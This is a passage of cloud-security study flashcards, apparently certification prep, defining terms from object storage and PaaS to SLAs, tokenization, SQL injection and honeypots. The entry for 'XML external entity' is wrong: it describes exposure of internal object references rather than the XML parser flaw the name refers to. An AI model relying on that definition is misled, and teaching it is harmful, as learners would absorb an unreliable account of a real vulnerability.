Assurance that the originator of data or a transaction cannot later plausibly deny having created or sent it. In practice this rests on evidence a third party can verify, such as a digital signature made with a key only the originator holds, combined with sound audit logging.

104
Q

object storage

A

A storage method used with IaaS where data elements are managed as objects rather than in hierarchical storage with a file system and directory structure.

105
Q

on-demand self-service

A

The ability for a cloud customer to provision services in an automatic manner, when needed, with minimal involvement from the cloud provider.

106
Q

TOGAF : The Open Group Architecture Framework

A

An open enterprise architecture framework and method that design teams use to plan, govern, and evolve an organization's architecture, improving efficiency and return on investment throughout a system's lifecycle.

107
Q

OLA : Operational Level Agreement

A

An official ITIL term that relates to a specialized service level agreement (SLA) pertaining to internal parties of an organization, rather than between a customer and provider (i.e. an SLA).

108
Q

overwriting

A

The process of sanitizing storage media by writing random or fixed patterns over the locations that held the data so that the original content cannot be recovered. In a cloud environment the customer typically cannot control which physical blocks held its data, and flash media remap writes internally, so overwriting cannot be relied upon; cryptographic erasure (destroying the key the data was encrypted with) is the usual alternative.

109
Q

pen testing / penetration testing

A

The process of testing systems and applications for vulnerabilities by employing the same tools and techniques used by malicious actors. Any vulnerabilities found can then be remediated by the organization before a malicious actor discovers them. Unlike a vulnerability scan, a penetration test attempts actual exploitation to demonstrate impact.

110
Q

PaaS : Platform as a Service

A

The capability provided to the customer to deploy onto the cloud infrastructure any consumer-created or acquired applications written using programming languages, libraries, services, and tools supported by the provider.

The customer does not manage or control the underlying cloud infrastructure, including the network, servers, operating systems, and storage, but has control over the deployed applications and possibly configuration settings for the application-hosting environment.

111
Q

portability

A

The ability of a system or application to seamlessly and easily move between different cloud providers.

112
Q

PLA : Privacy Level Agreement

A

A declaration published by the cloud service provider documenting its approach to data privacy. The cloud service provider implements and maintains the PLA for the systems it hosts.

113
Q

private cloud

A

A cloud infrastructure provisioned for exclusive use by a single organization comprising multiple consumers (for example, business units). It may be owned, managed, and operated by the organization, a third party, or some combination thereof, and it may exist on or off premises.

114
Q

PHI : Protected Health Information

A

A special designation of data under United States law (HIPAA) that encompasses any health-related data that can be tied to an individual, including health status, healthcare services sought or provided, or any payment related to healthcare.

115
Q

public cloud

A

A cloud infrastructure provisioned for open use by the general public. It may be owned, managed, and operated by a business, academic organization, governmental organization, or some combination thereof. It exists on the premises of the cloud provider.

116
Q

quantum computing

A

Computing that uses quantum-mechanical phenomena such as superposition and entanglement to perform certain computations far faster than classical machines can. Of note to the security professional: a sufficiently large quantum computer would break today's widely deployed public-key algorithms (RSA, elliptic curve) via Shor's algorithm, which is the motivation for post-quantum cryptography.

117
Q

RPO : Recovery Point Objective

A

The maximum amount of data loss, expressed as a span of time, that an organization is willing to accept following an interruption; it defines how far back in time the recovered state may be, and therefore how often backups or replication must run (an RPO of four hours requires a recoverable copy no more than four hours old).

118
Q

RTO : Recovery Time Objective

A

The maximum length of time an organization can tolerate a system, service, or set of data being unavailable following an interruption; it is the target for completing recovery and resuming service at the agreed level.

119
Q

relying party

A

A system or application that provides access to secure data through the use of an identity provider.

120
Q

RDP : Remote Desktop Protocol

A

RDP is a proprietary technology, developed by Microsoft, to allow users to connect to a remote computer over a network and utilize a graphical interface with the Windows operating system.

121
Q

REST : Representational State Transfer

A

A system for designing and implementing networked applications by utilizing a stateless, cacheable, client-server protocol, almost always via HTTP.

122
Q

RFC : Request For Change

A

A formal, documented change request, including what change is needed, why it is needed, the urgency of the change, a back-out plan should the change introduce instabilities to the system, and the impact if the change is not made.

123
Q

resource pooling

A

The aggregation and allocation of resources by the cloud provider to serve the cloud customers.

124
Q

reversibility

A

The ability of a cloud customer to recover all data and applications from a cloud provider and to completely remove all data from the cloud provider’s environment.

125
Q

RASP : Runtime Application Self-Protection

A

Security technology and systems integrated into a system or application that enables it to detect and prevent attacks in real time.

126
Q

sandboxing

A

The segregation and isolation of information or processes from others within the same system or application, typically for security concerns.

127
Q

SOC : Security Operations Center

A

A SOC is a centralized group that deals with security issues within an organization or enterprise and is responsible for the monitoring, reporting, and handling of security incidents. This is done at both the technical and organizational levels and touches all information assets within the organization.

128
Q

service

A

A computing system or application that processes data.

129
Q

SLA : Service Level Agreement

A

A document agreed upon between a customer and a service provider that defines and maps out minimum performance standards for a variety of contract requirements.

An SLA typically includes minimum standards for processes, uptime, availability, security, auditing, reporting, customer service, and potentially many other requirements.

130
Q

SP : Service Provider

A

An organization that provides IT services and applications to other organizations in a sourced manner.

131
Q

SABSA :

Sherwood Applied Business Security Architecture

A

SABSA is a proven methodology for developing business-driven, risk- and opportunity-focused security architectures, at both enterprise and solutions levels, that traceably support business objectives.

It is widely used for information assurance architectures and risk management frameworks, as well as to align and seamlessly integrate security and risk management into IT architecture methods, frameworks, models, and processes.

132
Q

SOAP : Simple Object Access Protocol

A

An operating-system-agnostic messaging protocol that is used to communicate with other systems through HTTP and XML.

133
Q

SLE : Single Loss Expectancy

A

The monetary value assigned to a single instance of an exploit against an IT service, application, or system.

SLE = AV (asset value) * EF (exposure factor) where the EF is a percentage of the asset lost in the attack.

The SLE is an input to ALE (annualized loss expectancy):
ALE = ARO (annual rate of occurrence) * SLE

134
Q

SOA : Service-Oriented Architecture

A

A system of providing IT applications and data services to other components through communications protocols over a network, independent of any particular technology, system, provider, or implementation.

135
Q

SOC 1 / SOC 2 / SOC 3

A

Audit and accounting reports, focused on an organization’s controls, that are employed when providing secure services to users.

SOC 1: target client is financial auditors; focus is management structure, customer base, pertinent regulations, auditors that verify compliance.

SOC 2: target client is “restricted use” internal review; focus is five (5) broad areas: availability, confidentiality, processing integrity, privacy, and security.

SOC 3: target client is “general use” third parties; scope of audit is similar to SOC 2 with the main difference being that the SOC 3 is intended for a general audience.

136
Q

SaaS : Software as a Service

A

An application hosted and maintained by the cloud provider as a service to be consumed by the cloud customer.

The cloud customer does not manage or control the underlying cloud infrastructure, including the network, servers, operating systems, storage, and even individual application capabilities, with the possible exception of limited user-specific application settings.

137
Q

SDN : Software Defined Networking

A

SDN separates the network configurations for the control plane from the data plane.

This separation allows network administrators to configure and control network infrastructure functions without having to get involved with the actual mechanisms for forwarding network traffic.

138
Q

SQL injection

A

A method used by malicious actors in which an SQL query is placed in an input field in the hope that it will be passed to the back-end database, executed by the database, and the database output returned to the attacker.

This could include attempts to access a full database, or protected data within it, or, to modify or delete data.

139
Q

SAST : Static Application Security Testing

A

Security testing of applications by analysis of source code, binaries, and configurations. This is done by testers who have in-depth knowledge of systems and applications and is performed in a non-running (i.e. static) state.

140
Q

tenant

A

One or more cloud customers who share access to a pool of resources.

141
Q

tokenization

A

The process of substituting sensitive data with an abstraction of that data (a token) which has no value outside of the application: e.g. the real SSN 2341 is replaced with the token 1234; translation back to the real SSN occurs only when needed, and disclosure of the token 1234 is harmless to both the firm and the person with SSN 2341.

142
Q

Trojan

A

An attempt to trick a user or administrator into executing an attack by disguising the true intention of a program or application.

143
Q

trust zones

A

A security concept that separates systems and data into different levels or zones; each zone can apply its own security controls based on the activities supported in that zone – e.g. RBAC for network assets.

In many instances, zones of a higher degree of trust may access those with a lower degree, but not vice versa.

144
Q

UC : Underpinning Contract

A

A contract negotiated and agreed upon between an organization and an external service provider or vendor.

145
Q

vertical cloud computing

A

The optimization of cloud computing resources for a particular stack or vertical, such as a specific type of application or system, or for a particular industry sector.

146
Q

virtual host or virtual machine

A

A software-based computing environment running on a host system as opposed to running within a physical hardware environment.

147
Q

VPN : Virtual Private Network

A

A VPN facilitates the extension of a private network over public networks and enables a device to operate as if it were on the private network directly.

A VPN works by enabling an encrypted point-to-point connection from a device into a private network, typically through software applications, but it can also be done via hardware accelerators.

148
Q

VMBR : VM-Based Rootkit

A

A type of rootkit that is installed in a virtualized environment between the underlying host system and the virtual machine.

It is then executed and used when the virtual machine is started. A VM-based rootkit is very difficult to detect in an environment, but also very difficult to successfully implement.

149
Q

volume storage

A

A more typical or standard file system used with IaaS that provides a virtual partition or hard disk to a virtual machine and can be used as a traditional hard drive would be, with a file system, folders, and file organization methods.

150
Q

WAF : Web Application Firewall

A

An appliance or software plug-in that parses and filters HTTP traffic from a browser or client and applies a set of rules before the traffic is allowed to proceed to the actual application server.

151
Q

web portal

A

A web-based application that provides tools, reporting, and visibility for a user into multiple systems. In a cloud environment, a web portal typically provides metrics and service up-sell / options / capabilities that the cloud customer may choose to consume.

152
Q

XML appliance

Extensible Mark-up Language (XML)

A

An appliance that is implemented within a network to secure and manage XML traffic; it is often used within a cloud environment to help integrate cloud-based systems with those still residing in traditional data centers.

153
Q

XML external entity

Extensible Mark-up Language (XML)

A

Occurs when a developer has in their code a reference to data on the application side, such as a database key, the directory structure of the application, configuration information about the hosting system, or any other information that pertains to the workings of the application, that should not be exposed to users or the network.

154
Q

Honeypots

A

A honeypot is a system, isolated from the production system, that is designed to appear to an attacker to be part of the production system and contain valuable data. The intent of a honeypot is to lure would-be attackers into going after the honeypot instead of a real production system.